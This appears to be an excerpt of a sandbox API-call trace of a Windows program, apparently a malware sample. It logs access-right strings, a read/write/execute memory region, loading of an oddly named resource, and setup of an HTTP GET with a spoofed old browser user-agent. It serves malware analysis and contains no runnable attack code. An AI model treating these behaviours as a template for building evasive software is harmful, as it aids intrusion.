[0140.342] SysReAllocStringLen (in: pbstr=0x2a8e080*=0x0, psz="SERVICE_PAUSE_CONTINUE", len=0x16 | out: pbstr=0x2a8e080*="SERVICE_PAUSE_CONTINUE") returned 1
[0140.343] SysReAllocStringLen (in: pbstr=0x2a8e070*=0x0, psz="SERVICE_INTERROGATE", len=0x13 | out: pbstr=0x2a8e070*="SERVICE_INTERROGATE") returned 1
[0140.343] SysReAllocStringLen (in: pbstr=0x2a8e060*=0x0, psz="SERVICE_ENUMERATE_DEPENDENTS", len=0x1c | out: pbstr=0x2a8e060*="SERVICE_ENUMERATE_DEPENDENTS") returned 1
[0140.343] SysReAllocStringLen (in: pbstr=0x2a8e050*=0x0, psz="SERVICE_CHANGE_CONFIG", len=0x15 | out: pbstr=0x2a8e050*="SERVICE_CHANGE_CONFIG") returned 1
[0140.343] SysReAllocStringLen (in: pbstr=0x2a8e040*=0x0, psz="SERVICE_ALL_ACCESS", len=0x12 | out: pbstr=0x2a8e040*="SERVICE_ALL_ACCESS") returned 1
[0140.343] SysReAllocStringLen (in: pbstr=0x2a8e030*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a8e030*="STANDARD_RIGHTS_EXECUTE") returned 1
[0140.343] SysReAllocStringLen (in: pbstr=0x2a8e020*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a8e020*="STANDARD_RIGHTS_WRITE") returned 1
[0140.343] SysReAllocStringLen (in: pbstr=0x2a8e010*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a8e010*="STANDARD_RIGHTS_READ") returned 1
[0140.343] SysReAllocStringLen (in: pbstr=0x2a8e000*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a8e000*="STANDARD_RIGHTS_ALL") returned 1
[0140.343] SysReAllocStringLen (in: pbstr=0x2a8dff0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a8dff0*="DELETE") returned 1
[0140.343] SysReAllocStringLen (in: pbstr=0x2a8dfe0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a8dfe0*="READ_CONTROL") returned 1
[0140.343] SysReAllocStringLen (in: pbstr=0x2a8dfd0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a8dfd0*="WRITE_OWNER") returned 1
[0140.343] SysReAllocStringLen (in: pbstr=0x2a8dfc0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a8dfc0*="WRITE_DAC") returned 1
[0140.343] SysReAllocStringLen (in: pbstr=0x2a8dfb0*=0x0, psz="KEY_SET_VALUE", len=0xd | out: pbstr=0x2a8dfb0*="KEY_SET_VALUE") returned 1
[0140.343] SysReAllocStringLen (in: pbstr=0x2a8dfa0*=0x0, psz="KEY_CREATE_LINK", len=0xf | out: pbstr=0x2a8dfa0*="KEY_CREATE_LINK") returned 1
[0140.343] SysReAllocStringLen (in: pbstr=0x2a8df90*=0x0, psz="KEY_CREATE_SUB_KEY", len=0x12 | out: pbstr=0x2a8df90*="KEY_CREATE_SUB_KEY") returned 1
[0140.343] SysReAllocStringLen (in: pbstr=0x2a8df80*=0x0, psz="KEY_NOTIFY", len=0xa | out: pbstr=0x2a8df80*="KEY_NOTIFY") returned 1
[0140.343] SysReAllocStringLen (in: pbstr=0x2a8df70*=0x0, psz="KEY_ENUMERATE_SUB_KEYS", len=0x16 | out: pbstr=0x2a8df70*="KEY_ENUMERATE_SUB_KEYS") returned 1
[0140.343] SysReAllocStringLen (in: pbstr=0x2a8df60*=0x0, psz="KEY_QUERY_VALUE", len=0xf | out: pbstr=0x2a8df60*="KEY_QUERY_VALUE") returned 1
[0140.343] SysReAllocStringLen (in: pbstr=0x2a8df50*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a8df50*="STANDARD_RIGHTS_EXECUTE") returned 1
[0140.343] SysReAllocStringLen (in: pbstr=0x2a8df40*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a8df40*="STANDARD_RIGHTS_WRITE") returned 1
[0140.343] SysReAllocStringLen (in: pbstr=0x2a8df30*=0x0, psz="STANDARD_RIGHTS_READ 2", len=0x16 | out: pbstr=0x2a8df30*="STANDARD_RIGHTS_READ 2") returned 1
[0140.343] SysReAllocStringLen (in: pbstr=0x2a8df20*=0x0, psz="STANDARD_RIGHTS_ALL 1", len=0x15 | out: pbstr=0x2a8df20*="STANDARD_RIGHTS_ALL 1") returned 1
[0140.343] SysReAllocStringLen (in: pbstr=0x2a8df10*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a8df10*="DELETE") returned 1
[0140.343] SysReAllocStringLen (in: pbstr=0x2a8df00*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a8df00*="READ_CONTROL") returned 1
[0140.343] SysReAllocStringLen (in: pbstr=0x2a8def0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a8def0*="WRITE_OWNER") returned 1
[0140.343] SysReAllocStringLen (in: pbstr=0x2a8dee0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a8dee0*="WRITE_DAC") returned 1
[0140.343] SysReAllocStringLen (in: pbstr=0x2a8ded0*=0x0, psz="DESKTOP_SWITCHDESKTOP", len=0x15 | out: pbstr=0x2a8ded0*="DESKTOP_SWITCHDESKTOP") returned 1
[0140.343] SysReAllocStringLen (in: pbstr=0x2a8dec0*=0x0, psz="DESKTOP_WRITEOBJECTS", len=0x14 | out: pbstr=0x2a8dec0*="DESKTOP_WRITEOBJECTS") returned 1
[0140.343] SysReAllocStringLen (in: pbstr=0x2a8deb0*=0x0, psz="DESKTOP_JOURNALRECORD", len=0x15 | out: pbstr=0x2a8deb0*="DESKTOP_JOURNALRECORD") returned 1
[0140.343] SysReAllocStringLen (in: pbstr=0x2a8dea0*=0x0, psz="DESKTOP_JOURNALPLAYBACK", len=0x17 | out: pbstr=0x2a8dea0*="DESKTOP_JOURNALPLAYBACK") returned 1
[0140.343] SysReAllocStringLen (in: pbstr=0x2a8de90*=0x0, psz="DESKTOP_HOOKCONTROL", len=0x13 | out: pbstr=0x2a8de90*="DESKTOP_HOOKCONTROL") returned 1
[0140.343] SysReAllocStringLen (in: pbstr=0x2a8de80*=0x0, psz="DESKTOP_CREATEWINDOW", len=0x14 | out: pbstr=0x2a8de80*="DESKTOP_CREATEWINDOW") returned 1
[0140.343] SysReAllocStringLen (in: pbstr=0x2a8de70*=0x0, psz="DESKTOP_CREATEMENU", len=0x12 | out: pbstr=0x2a8de70*="DESKTOP_CREATEMENU") returned 1
[0140.343] SysReAllocStringLen (in: pbstr=0x2a8de60*=0x0, psz="DESKTOP_READOBJECTS", len=0x13 | out: pbstr=0x2a8de60*="DESKTOP_READOBJECTS") returned 1
[0140.343] SysReAllocStringLen (in: pbstr=0x2a8de50*=0x0, psz="DESKTOP_ENUMERATE", len=0x11 | out: pbstr=0x2a8de50*="DESKTOP_ENUMERATE") returned 1
[0140.343] SysReAllocStringLen (in: pbstr=0x2a8de40*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a8de40*="STANDARD_RIGHTS_EXECUTE") returned 1
[0140.344] SysReAllocStringLen (in: pbstr=0x2a8de30*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a8de30*="STANDARD_RIGHTS_WRITE") returned 1
[0140.344] SysReAllocStringLen (in: pbstr=0x2a8de20*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a8de20*="STANDARD_RIGHTS_READ") returned 1
[0140.344] SysReAllocStringLen (in: pbstr=0x2a8de10*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a8de10*="STANDARD_RIGHTS_ALL") returned 1
[0140.344] SysReAllocStringLen (in: pbstr=0x2a8de00*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a8de00*="DELETE") returned 1
[0140.344] SysReAllocStringLen (in: pbstr=0x2a8ddf0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a8ddf0*="READ_CONTROL") returned 1
[0140.344] SysReAllocStringLen (in: pbstr=0x2a8dde0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a8dde0*="WRITE_OWNER") returned 1
[0140.344] SysReAllocStringLen (in: pbstr=0x2a8ddd0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a8ddd0*="WRITE_DAC") returned 1
[0140.344] SysReAllocStringLen (in: pbstr=0x2a8ddc0*=0x0, psz="WINSTA_WRITEATTRIBUTES", len=0x16 | out: pbstr=0x2a8ddc0*="WINSTA_WRITEATTRIBUTES") returned 1
[0140.344] SysReAllocStringLen (in: pbstr=0x2a8ddb0*=0x0, psz="WINSTA_READSCREEN", len=0x11 | out: pbstr=0x2a8ddb0*="WINSTA_READSCREEN") returned 1
[0140.344] SysReAllocStringLen (in: pbstr=0x2a8dda0*=0x0, psz="WINSTA_READATTRIBUTES", len=0x15 | out: pbstr=0x2a8dda0*="WINSTA_READATTRIBUTES") returned 1
[0140.344] SysReAllocStringLen (in: pbstr=0x2a8dd90*=0x0, psz="WINSTA_EXITWINDOWS", len=0x12 | out: pbstr=0x2a8dd90*="WINSTA_EXITWINDOWS") returned 1
[0140.344] SysReAllocStringLen (in: pbstr=0x2a8dd80*=0x0, psz="WINSTA_ENUMERATE", len=0x10 | out: pbstr=0x2a8dd80*="WINSTA_ENUMERATE") returned 1
[0140.344] SysReAllocStringLen (in: pbstr=0x2a8dd70*=0x0, psz="WINSTA_ENUMDESKTOPS", len=0x13 | out: pbstr=0x2a8dd70*="WINSTA_ENUMDESKTOPS") returned 1
[0140.344] SysReAllocStringLen (in: pbstr=0x2a8dd60*=0x0, psz="WINSTA_CREATEDESKTOP", len=0x14 | out: pbstr=0x2a8dd60*="WINSTA_CREATEDESKTOP") returned 1
[0140.344] SysReAllocStringLen (in: pbstr=0x2a8dd50*=0x0, psz="WINSTA_ACCESSGLOBALATOMS", len=0x18 | out: pbstr=0x2a8dd50*="WINSTA_ACCESSGLOBALATOMS") returned 1
[0140.344] SysReAllocStringLen (in: pbstr=0x2a8dd40*=0x0, psz="WINSTA_ACCESSCLIPBOARD", len=0x16 | out: pbstr=0x2a8dd40*="WINSTA_ACCESSCLIPBOARD") returned 1
[0140.344] SysReAllocStringLen (in: pbstr=0x2a8dd30*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a8dd30*="STANDARD_RIGHTS_EXECUTE") returned 1
[0140.344] SysReAllocStringLen (in: pbstr=0x2a8dd20*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a8dd20*="STANDARD_RIGHTS_WRITE") returned 1
[0140.344] SysReAllocStringLen (in: pbstr=0x2a8dd10*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a8dd10*="STANDARD_RIGHTS_READ") returned 1
[0140.344] SysReAllocStringLen (in: pbstr=0x2a8dd00*=0x0, psz="STANDARD_RIGHTS_REQUIRED", len=0x18 | out: pbstr=0x2a8dd00*="STANDARD_RIGHTS_REQUIRED") returned 1
[0140.344] SysReAllocStringLen (in: pbstr=0x2a8dcf0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a8dcf0*="READ_CONTROL") returned 1
[0140.344] SysReAllocStringLen (in: pbstr=0x2a8dce0*=0x0, psz="SI_ACCESS_SPECIFIC", len=0x12 | out: pbstr=0x2a8dce0*="SI_ACCESS_SPECIFIC") returned 1
[0140.344] SysReAllocStringLen (in: pbstr=0x2a8dcd0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a8dcd0*="WRITE_DAC") returned 1
[0140.344] SysReAllocStringLen (in: pbstr=0x2a8dcc0*=0x0, psz="FILE_DELETE", len=0xb | out: pbstr=0x2a8dcc0*="FILE_DELETE") returned 1
[0140.344] SysReAllocStringLen (in: pbstr=0x2a8dcb0*=0x0, psz="FILE_DELETE_CHILD", len=0x11 | out: pbstr=0x2a8dcb0*="FILE_DELETE_CHILD") returned 1
[0140.345] SetClassLongA (hWnd=0x701de, nIndex=-14, dwNewLong=65575) returned 0x0
[0140.346] GetSystemMenu (hWnd=0x701de, bRevert=0) returned 0x601d5
[0140.346] DeleteMenu (hMenu=0x601d5, uPosition=0xf030, uFlags=0x0) returned 1
[0140.346] DeleteMenu (hMenu=0x601d5, uPosition=0xf000, uFlags=0x0) returned 1
[0140.346] DeleteMenu (hMenu=0x601d5, uPosition=0xf010, uFlags=0x0) returned 1
[0140.346] GetCurrentThreadId () returned 0x89c
[0140.346] ResetEvent (hEvent=0xa0) returned 1
[0140.346] GetCurrentThreadId () returned 0x89c
[0140.346] GetCurrentThreadId () returned 0x89c
[0140.346] GetCurrentThreadId () returned 0x89c
[0140.346] ResetEvent (hEvent=0xa0) returned 1
[0140.346] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x18f444, fWinIni=0x0 | out: pvParam=0x18f444) returned 1
[0140.346] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x18f444, fWinIni=0x0 | out: pvParam=0x18f444) returned 1
[0140.346] GetSystemMetrics (nIndex=49) returned 16
[0140.346] GetSystemMetrics (nIndex=50) returned 16
[0140.347] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x18f48c, fWinIni=0x0 | out: pvParam=0x18f48c) returned 1
[0140.347] IsWindowVisible (hWnd=0x701de) returned 0
[0140.347] GetCurrentThreadId () returned 0x89c
[0140.347] VirtualQuery (in: lpAddress=0x2a61668, lpBuffer=0x18f35c, dwLength=0x1c | out: lpBuffer=0x18f35c*(BaseAddress=0x2a61000, AllocationBase=0x29a0000, AllocationProtect=0x40, RegionSize=0x52000, State=0x1000, Protect=0x40, Type=0x20000)) returned 0x1c
[0140.347] FindResourceA (hModule=0x29a0000, lpName="TmarxvxinhhmA", lpType=0xa) returned 0x2aa8990
[0140.347] FindResourceA (hModule=0x29a0000, lpName="TmarxvxinhhmA", lpType=0xa) returned 0x2aa8990
[0140.347] LoadResource (hModule=0x29a0000, hResInfo=0x2aa8990) returned 0x2aaf044
[0140.347] SizeofResource (hModule=0x29a0000, hResInfo=0x2aa8990) returned 0xca5
[0140.347] LockResource (hResData=0x2aaf044) returned 0x2aaf044
[0140.347] GetCurrentThreadId () returned 0x89c
[0140.347] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x18f110, fWinIni=0x0 | out: pvParam=0x18f110) returned 1
[0140.347] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x18f110, fWinIni=0x0 | out: pvParam=0x18f110) returned 1
[0140.347] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x18f110, fWinIni=0x0 | out: pvParam=0x18f110) returned 1
[0140.348] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x18f110, fWinIni=0x0 | out: pvParam=0x18f110) returned 1
[0140.349] GetDC (hWnd=0x0) returned 0x4101082e
[0140.349] GetTextMetricsA (in: hdc=0x4101082e, lptm=0x18f0f4 | out: lptm=0x18f0f4) returned 1
[0140.349] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="MS Sans Serif", cchCount1=13, lpString2="Default", cchCount2=7) returned 3
[0140.350] CreateFontIndirectA (lplf=0x18f0ac) returned 0x530a0852
[0140.350] SelectObject (hdc=0x4101082e, h=0x530a0852) returned 0x18a002e
[0140.350] GetTextMetricsA (in: hdc=0x4101082e, lptm=0x18f12c | out: lptm=0x18f12c) returned 1
[0140.350] SelectObject (hdc=0x4101082e, h=0x18a002e) returned 0x530a0852
[0140.350] ReleaseDC (hWnd=0x0, hDC=0x4101082e) returned 1
[0140.350] GetSystemMetrics (nIndex=6) returned 1
[0140.350] VirtualAlloc (lpAddress=0x2ac4000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2ac4000
[0140.351] GetDC (hWnd=0x0) returned 0x4101082e
[0140.351] GetTextMetricsA (in: hdc=0x4101082e, lptm=0x18f0f4 | out: lptm=0x18f0f4) returned 1
[0140.351] SelectObject (hdc=0x4101082e, h=0x530a0852) returned 0x18a002e
[0140.351] GetTextMetricsA (in: hdc=0x4101082e, lptm=0x18f12c | out: lptm=0x18f12c) returned 1
[0140.351] SelectObject (hdc=0x4101082e, h=0x18a002e) returned 0x530a0852
[0140.351] ReleaseDC (hWnd=0x0, hDC=0x4101082e) returned 1
[0140.351] GetSystemMetrics (nIndex=6) returned 1
[0140.351] GetDC (hWnd=0x0) returned 0x4101082e
[0140.351] GetTextMetricsA (in: hdc=0x4101082e, lptm=0x18f0f4 | out: lptm=0x18f0f4) returned 1
[0140.351] SelectObject (hdc=0x4101082e, h=0x530a0852) returned 0x18a002e
[0140.351] GetTextMetricsA (in: hdc=0x4101082e, lptm=0x18f12c | out: lptm=0x18f12c) returned 1
[0140.351] SelectObject (hdc=0x4101082e, h=0x18a002e) returned 0x530a0852
[0140.351] ReleaseDC (hWnd=0x0, hDC=0x4101082e) returned 1
[0140.351] GetSystemMetrics (nIndex=6) returned 1
[0140.352] GetDC (hWnd=0x0) returned 0x4101082e
[0140.352] GetTextMetricsA (in: hdc=0x4101082e, lptm=0x18f0f4 | out: lptm=0x18f0f4) returned 1
[0140.352] SelectObject (hdc=0x4101082e, h=0x530a0852) returned 0x18a002e
[0140.352] GetTextMetricsA (in: hdc=0x4101082e, lptm=0x18f12c | out: lptm=0x18f12c) returned 1
[0140.352] SelectObject (hdc=0x4101082e, h=0x18a002e) returned 0x530a0852
[0140.352] ReleaseDC (hWnd=0x0, hDC=0x4101082e) returned 1
[0140.352] GetSystemMetrics (nIndex=6) returned 1
[0140.352] GetDC (hWnd=0x0) returned 0x4101082e
[0140.352] GetTextMetricsA (in: hdc=0x4101082e, lptm=0x18f108 | out: lptm=0x18f108) returned 1
[0140.352] SelectObject (hdc=0x4101082e, h=0x530a0852) returned 0x18a002e
[0140.352] GetTextMetricsA (in: hdc=0x4101082e, lptm=0x18f140 | out: lptm=0x18f140) returned 1
[0140.352] SelectObject (hdc=0x4101082e, h=0x18a002e) returned 0x530a0852
[0140.352] ReleaseDC (hWnd=0x0, hDC=0x4101082e) returned 1
[0140.352] GetSystemMetrics (nIndex=6) returned 1
[0140.352] GetDC (hWnd=0x0) returned 0x4101082e
[0140.352] GetTextMetricsA (in: hdc=0x4101082e, lptm=0x18ee0c | out: lptm=0x18ee0c) returned 1
[0140.352] SelectObject (hdc=0x4101082e, h=0x530a0852) returned 0x18a002e
[0140.352] GetTextMetricsA (in: hdc=0x4101082e, lptm=0x18ee44 | out: lptm=0x18ee44) returned 1
[0140.353] SelectObject (hdc=0x4101082e, h=0x18a002e) returned 0x530a0852
[0140.353] ReleaseDC (hWnd=0x0, hDC=0x4101082e) returned 1
[0140.353] GetSystemMetrics (nIndex=6) returned 1
[0140.353] GetDC (hWnd=0x0) returned 0x4101082e
[0140.353] GetTextMetricsA (in: hdc=0x4101082e, lptm=0x18f108 | out: lptm=0x18f108) returned 1
[0140.353] SelectObject (hdc=0x4101082e, h=0x530a0852) returned 0x18a002e
[0140.353] GetTextMetricsA (in: hdc=0x4101082e, lptm=0x18f140 | out: lptm=0x18f140) returned 1
[0140.353] SelectObject (hdc=0x4101082e, h=0x18a002e) returned 0x530a0852
[0140.353] ReleaseDC (hWnd=0x0, hDC=0x4101082e) returned 1
[0140.353] GetSystemMetrics (nIndex=6) returned 1
[0140.353] GetDC (hWnd=0x0) returned 0x4101082e
[0140.353] GetTextMetricsA (in: hdc=0x4101082e, lptm=0x18ee0c | out: lptm=0x18ee0c) returned 1
[0140.353] SelectObject (hdc=0x4101082e, h=0x530a0852) returned 0x18a002e
[0140.353] GetTextMetricsA (in: hdc=0x4101082e, lptm=0x18ee44 | out: lptm=0x18ee44) returned 1
[0140.353] SelectObject (hdc=0x4101082e, h=0x18a002e) returned 0x530a0852
[0140.353] ReleaseDC (hWnd=0x0, hDC=0x4101082e) returned 1
[0140.353] GetSystemMetrics (nIndex=6) returned 1
[0140.354] GetDC (hWnd=0x0) returned 0x4101082e
[0140.354] GetTextMetricsA (in: hdc=0x4101082e, lptm=0x18f108 | out: lptm=0x18f108) returned 1
[0140.354] SelectObject (hdc=0x4101082e, h=0x530a0852) returned 0x18a002e
[0140.354] GetTextMetricsA (in: hdc=0x4101082e, lptm=0x18f140 | out: lptm=0x18f140) returned 1
[0140.354] SelectObject (hdc=0x4101082e, h=0x18a002e) returned 0x530a0852
[0140.354] ReleaseDC (hWnd=0x0, hDC=0x4101082e) returned 1
[0140.354] GetSystemMetrics (nIndex=6) returned 1
[0140.354] GetDC (hWnd=0x0) returned 0x4101082e
[0140.354] GetTextMetricsA (in: hdc=0x4101082e, lptm=0x18ee0c | out: lptm=0x18ee0c) returned 1
[0140.354] SelectObject (hdc=0x4101082e, h=0x530a0852) returned 0x18a002e
[0140.354] GetTextMetricsA (in: hdc=0x4101082e, lptm=0x18ee44 | out: lptm=0x18ee44) returned 1
[0140.354] SelectObject (hdc=0x4101082e, h=0x18a002e) returned 0x530a0852
[0140.354] ReleaseDC (hWnd=0x0, hDC=0x4101082e) returned 1
[0140.354] GetSystemMetrics (nIndex=6) returned 1
[0140.354] GetDC (hWnd=0x0) returned 0x4101082e
[0140.354] GetTextMetricsA (in: hdc=0x4101082e, lptm=0x18f0f4 | out: lptm=0x18f0f4) returned 1
[0140.354] SelectObject (hdc=0x4101082e, h=0x530a0852) returned 0x18a002e
[0140.354] GetTextMetricsA (in: hdc=0x4101082e, lptm=0x18f12c | out: lptm=0x18f12c) returned 1
[0140.354] SelectObject (hdc=0x4101082e, h=0x18a002e) returned 0x530a0852
[0140.354] ReleaseDC (hWnd=0x0, hDC=0x4101082e) returned 1
[0140.354] GetSystemMetrics (nIndex=6) returned 1
[0140.355] GetDC (hWnd=0x0) returned 0x4101082e
[0140.355] GetTextMetricsA (in: hdc=0x4101082e, lptm=0x18f0f4 | out: lptm=0x18f0f4) returned 1
[0140.355] SelectObject (hdc=0x4101082e, h=0x530a0852) returned 0x18a002e
[0140.355] GetTextMetricsA (in: hdc=0x4101082e, lptm=0x18f12c | out: lptm=0x18f12c) returned 1
[0140.355] SelectObject (hdc=0x4101082e, h=0x18a002e) returned 0x530a0852
[0140.355] ReleaseDC (hWnd=0x0, hDC=0x4101082e) returned 1
[0140.355] GetSystemMetrics (nIndex=6) returned 1
[0140.355] GetDC (hWnd=0x0) returned 0x4101082e
[0140.355] GetTextMetricsA (in: hdc=0x4101082e, lptm=0x18f108 | out: lptm=0x18f108) returned 1
[0140.355] SelectObject (hdc=0x4101082e, h=0x530a0852) returned 0x18a002e
[0140.355] GetTextMetricsA (in: hdc=0x4101082e, lptm=0x18f140 | out: lptm=0x18f140) returned 1
[0140.355] SelectObject (hdc=0x4101082e, h=0x18a002e) returned 0x530a0852
[0140.355] ReleaseDC (hWnd=0x0, hDC=0x4101082e) returned 1
[0140.355] GetSystemMetrics (nIndex=6) returned 1
[0140.355] GetDC (hWnd=0x0) returned 0x4101082e
[0140.356] GetTextMetricsA (in: hdc=0x4101082e, lptm=0x18ee0c | out: lptm=0x18ee0c) returned 1
[0140.356] SelectObject (hdc=0x4101082e, h=0x530a0852) returned 0x18a002e
[0140.356] GetTextMetricsA (in: hdc=0x4101082e, lptm=0x18ee44 | out: lptm=0x18ee44) returned 1
[0140.356] SelectObject (hdc=0x4101082e, h=0x18a002e) returned 0x530a0852
[0140.356] ReleaseDC (hWnd=0x0, hDC=0x4101082e) returned 1
[0140.356] GetSystemMetrics (nIndex=6) returned 1
[0140.356] GetDC (hWnd=0x0) returned 0x4101082e
[0140.356] GetTextMetricsA (in: hdc=0x4101082e, lptm=0x18f108 | out: lptm=0x18f108) returned 1
[0140.356] SelectObject (hdc=0x4101082e, h=0x530a0852) returned 0x18a002e
[0140.356] GetTextMetricsA (in: hdc=0x4101082e, lptm=0x18f140 | out: lptm=0x18f140) returned 1
[0140.356] SelectObject (hdc=0x4101082e, h=0x18a002e) returned 0x530a0852
[0140.356] ReleaseDC (hWnd=0x0, hDC=0x4101082e) returned 1
[0140.356] GetSystemMetrics (nIndex=6) returned 1
[0140.356] GetDC (hWnd=0x0) returned 0x4101082e
[0140.356] GetTextMetricsA (in: hdc=0x4101082e, lptm=0x18ee0c | out: lptm=0x18ee0c) returned 1
[0140.356] SelectObject (hdc=0x4101082e, h=0x530a0852) returned 0x18a002e
[0140.356] GetTextMetricsA (in: hdc=0x4101082e, lptm=0x18ee44 | out: lptm=0x18ee44) returned 1
[0140.356] SelectObject (hdc=0x4101082e, h=0x18a002e) returned 0x530a0852
[0140.356] ReleaseDC (hWnd=0x0, hDC=0x4101082e) returned 1
[0140.356] GetSystemMetrics (nIndex=6) returned 1
[0140.357] GetDC (hWnd=0x0) returned 0x4101082e
[0140.357] GetTextMetricsA (in: hdc=0x4101082e, lptm=0x18f108 | out: lptm=0x18f108) returned 1
[0140.357] SelectObject (hdc=0x4101082e, h=0x530a0852) returned 0x18a002e
[0140.357] GetTextMetricsA (in: hdc=0x4101082e, lptm=0x18f140 | out: lptm=0x18f140) returned 1
[0140.357] SelectObject (hdc=0x4101082e, h=0x18a002e) returned 0x530a0852
[0140.357] ReleaseDC (hWnd=0x0, hDC=0x4101082e) returned 1
[0140.357] GetSystemMetrics (nIndex=6) returned 1
[0140.357] GetDC (hWnd=0x0) returned 0x4101082e
[0140.357] GetTextMetricsA (in: hdc=0x4101082e, lptm=0x18ee0c | out: lptm=0x18ee0c) returned 1
[0140.357] SelectObject (hdc=0x4101082e, h=0x530a0852) returned 0x18a002e
[0140.357] GetTextMetricsA (in: hdc=0x4101082e, lptm=0x18ee44 | out: lptm=0x18ee44) returned 1
[0140.357] SelectObject (hdc=0x4101082e, h=0x18a002e) returned 0x530a0852
[0140.357] ReleaseDC (hWnd=0x0, hDC=0x4101082e) returned 1
[0140.357] GetSystemMetrics (nIndex=6) returned 1
[0140.358] GetDC (hWnd=0x0) returned 0x4101082e
[0140.358] GetTextMetricsA (in: hdc=0x4101082e, lptm=0x18f108 | out: lptm=0x18f108) returned 1
[0140.358] SelectObject (hdc=0x4101082e, h=0x530a0852) returned 0x18a002e
[0140.358] GetTextMetricsA (in: hdc=0x4101082e, lptm=0x18f140 | out: lptm=0x18f140) returned 1
[0140.358] SelectObject (hdc=0x4101082e, h=0x18a002e) returned 0x530a0852
[0140.358] ReleaseDC (hWnd=0x0, hDC=0x4101082e) returned 1
[0140.358] GetSystemMetrics (nIndex=6) returned 1
[0140.358] GetDC (hWnd=0x0) returned 0x4101082e
[0140.358] GetTextMetricsA (in: hdc=0x4101082e, lptm=0x18ee0c | out: lptm=0x18ee0c) returned 1
[0140.358] SelectObject (hdc=0x4101082e, h=0x530a0852) returned 0x18a002e
[0140.358] GetTextMetricsA (in: hdc=0x4101082e, lptm=0x18ee44 | out: lptm=0x18ee44) returned 1
[0140.358] SelectObject (hdc=0x4101082e, h=0x18a002e) returned 0x530a0852
[0140.358] ReleaseDC (hWnd=0x0, hDC=0x4101082e) returned 1
[0140.358] GetSystemMetrics (nIndex=6) returned 1
[0140.358] GetDC (hWnd=0x0) returned 0x4101082e
[0140.358] GetTextMetricsA (in: hdc=0x4101082e, lptm=0x18f0f4 | out: lptm=0x18f0f4) returned 1
[0140.358] SelectObject (hdc=0x4101082e, h=0x530a0852) returned 0x18a002e
[0140.358] GetTextMetricsA (in: hdc=0x4101082e, lptm=0x18f12c | out: lptm=0x18f12c) returned 1
[0140.359] SelectObject (hdc=0x4101082e, h=0x18a002e) returned 0x530a0852
[0140.359] ReleaseDC (hWnd=0x0, hDC=0x4101082e) returned 1
[0140.359] GetSystemMetrics (nIndex=6) returned 1
[0140.360] SysReAllocStringLen (in: pbstr=0x2acf388*=0x0, psz="GET", len=0x3 | out: pbstr=0x2acf388*="GET") returned 1
[0140.360] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0140.360] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0140.360] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0140.360] SysReAllocStringLen (in: pbstr=0x2acf388*="GET", psz="GET", len=0x3 | out: pbstr=0x2acf388*="GET") returned 1
[0140.361] SysReAllocStringLen (in: pbstr=0x2acf3b8*=0x0, psz="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1)", len=0x39 | out: pbstr=0x2acf3b8*="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1)") returned 1
[0140.361] InternetQueryOptionW (in: hInternet=0x0, dwOption=0x6, lpBuffer=0x18f190, lpdwBufferLength=0x18f194 | out: lpBuffer=0x18f190, lpdwBufferLength=0x18f194) returned 1
[0140.447] InternetSetOptionW (hInternet=0x0, dwOption=0x6, lpBuffer=0x18f190, dwBufferLength=0x4) returned 1
[0140.447] VirtualFree (lpAddress=0x2ad0000, dwSize=0x4000, dwFreeType=0x4000) returned 1
[0140.447] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x2ac6490, cbMultiByte=3, lpWideCharStr=0x18e0c8, cchWideChar=2047 | out: lpWideCharStr="GET") returned 3
[0140.447] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0140.447] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
